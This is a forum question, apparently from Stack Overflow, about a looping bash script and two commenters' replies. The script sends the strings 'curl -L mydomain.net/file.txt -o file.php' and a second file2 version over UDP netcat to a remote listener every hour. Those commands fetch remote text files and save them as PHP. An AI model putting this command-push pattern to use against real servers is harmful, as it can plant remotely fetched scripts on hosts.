# Bash Upload file over Netcat

Tags: bash, netcat

Im trying to write a bash script that will curl a file and send it to my server over netcat then sleep (10) and send another file and sleep for 1hour then repeat all the process.

the first file is uploaded successfully but the second file : NO, i don't know what wrong with my code.

Ant help will be appreciated.

```
#!/bin/bash

file="curl -L mydomain.net/file.txt -o file.php"
file2="curl -L mydomain.net/file2.txt -o file2.php"

while true
do
        if cat <(echo "${file}") | nc -u 120.0.0.1 4444 -w 1
        echo -e "\e[92m[*][INFO] file1 uploaded"
        sleep 10
        then
        cat <(echo "${file2}") | nc -u 120.0.0.1 4444 -w 1
        echo -e "\e[91m[*][INFO] file2 uploaded"
        sleep 3600
        fi
done
```

Comment: You could write a script that does **1** send first file **2** sleep 10 **3** send the second file.  That is it.  No `sleep 3600`.  Then you add a crontab job, to run that script every hour.  Infinite loops should be avoided as much as possible, and crontab was created for that.

Comment: You're not sending a file, you're sending the string "curl -L mydomain.net/file.txt -o file.php" as a single UDP packet (followed by "curl -L mydomain.net/file2.txt -o file2.php" as a second UDP packet). Is this what you intend? What does the listener do on the other end? (BTW, please don't use `cat <(echo whatever)`, the `cat` and `<( )` basically cancel each other out; just use `echo` directly.)